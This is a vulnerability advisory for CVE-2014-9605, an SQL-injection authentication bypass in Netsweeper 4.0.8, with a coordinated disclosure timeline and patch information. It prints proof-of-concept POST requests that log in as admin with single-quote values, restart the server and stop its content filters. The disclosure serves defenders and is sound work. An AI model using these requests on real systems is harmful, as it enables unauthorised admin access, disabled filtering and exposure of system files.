+----------------------------------------------------------------+ + Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) + +----------------------------------------------------------------+ Affected Product: Netsweeper Vendor Homepage : www.netsweeper.com/ Version : 4.0.8 (and probably other versions) Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] Patched : Yes CVE : CVE-2014-9605 +---------------------+ + Product Description + +---------------------+ Netsweeper is a software solution specialized in content filtering. +----------------------+ + Exploitation Details + +----------------------+ By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to: i) "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders) ii) "Restart" the server iii) "Stop the filters on the server" Vulnerability Type: Authentication Bypass (using two single-quotes) p0c: http://netsweeper/webupgrade/webupgrade.php POST: step=&login='&password='&show_advanced_output= p0c restart the server: http://netsweeper/webupgrade/webupgrade.php POST: step=12&login='&password='&show_advanced_output= followed by http://netsweeper/webupgrade/webupgrade.php HTTP/1.1 POST: step=12&restart=yes&show_advanced_output=false p0c stop the filters on the server: http://netsweeper/webupgrade/webupgrade.php POST: step=9&stopservices=yes&show_advanced_output= +----------+ + Solution + +----------+ Upgrade to latest version. +---------------------+ + Disclosure Timeline + +---------------------+ 24-Nov-2014: Initial Communication 03-Dec-2014: Netsweeper responded 03-Dec-2014: Shared full details to replicate the issue 10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2 17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public 18-Dec-2014: Confirm fix 17-Jan-2015: CVE assigned CVE-2014-9605 11-Aug-2015: Public disclosure